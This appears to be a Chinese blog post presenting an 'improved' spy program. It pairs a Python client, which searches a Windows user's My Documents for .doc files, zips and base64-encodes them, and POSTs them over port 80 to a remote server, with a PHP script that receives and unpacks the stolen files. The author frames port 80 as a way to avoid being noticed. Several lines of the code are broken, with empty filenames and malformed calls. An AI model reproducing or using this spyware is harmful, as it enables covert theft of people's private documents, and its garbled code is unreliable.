python 间谍程序传输文件改进版 PHP作服务端
python 间谍程序传输文件改进版 PHP作服务端
1、作为间谍程序,自己开2000端口,很容易被发现,应该走80端口2、用PHP作服务端比用python直接IP开server socket 简单,自然且稳定一点(也就一点啦)
<?php function unzip_file($file, $destination){ //php.ini 中 的extension=php_zip.dll 要解注释 $zip = new ZipArchive() ; if ($zip->open($file) !== TRUE) { die ('Could not open archive'); } $zip->extractTo($destination); $zip->close(); echo 'ok'."<br/>"; } $path = iconv("UTF-8","gb2312","C:\\Documents and Settings\\Administrator\\桌面"); $filename = $path +"\\"; echo $filename."<br/>"; $fp = fopen($filename,"wb"); $encode_data = file_get_contents("php://input"); $decode_data = base64_decode($encode_data); fwrite($fp,$decode_data); unzip_file($filename,$path); echo "finished!"."<br/>" ?>
# -*- coding: cp936 -*- import socket import win32com.client import win32api import os import time import zipfile import codecs import base64 import urllib2,urllib,httplib def walk_dir(dir,filelist,extName,topdown=True): for root, dirs, files in os.walk(dir, topdown): for name in files: if (os.path.splitext(os.path.join(root,name)))[-1] == extName: filelist.append(os.path.join(root,name)) for name in dirs: if (os.path.splitext(os.path.join(root,name)))[-1] == extName: filelist.append(os.path.join(root,name)) def post_data(data,HOST,PORT): conn = httplib.HTTPConnection(HOST,PORT) conn.request('POST','/server.php',data,{}) response = conn.getresponse() resdata = print response def main(): HOST = '' PORT = 80 BUF_SIZE = 65535 key = 'ouyang' dicName = "C:\Documents and Settings\Administrator\我的文档" extName = '.doc' #遍历搜索我的文档的doc类型 try: filelist = [] walk_dir(dicName,filelist,extName) except IOError,e: print "文件处理错误: " % e sys.exit(-1) #压缩成zip文件 zfile = zipfile.ZipFile('','w',zipfile.ZIP_DEFLATED) for f in filelist: zfile.write(f) zfile.close() #base 2进制 加密 encode(infile,outfile) infile = open('','rb') tmpfile = open('in.tmp','wb') base64.encode(infile,tmpfile) infile.close() tmpfile.close() #send tmpfile = open('in.tmp','rb') post_data(,HOST,PORT) tmpfile.close() #后续处理 删除中间文件 os.remove('in.tmp')
if __name__=='__main__':
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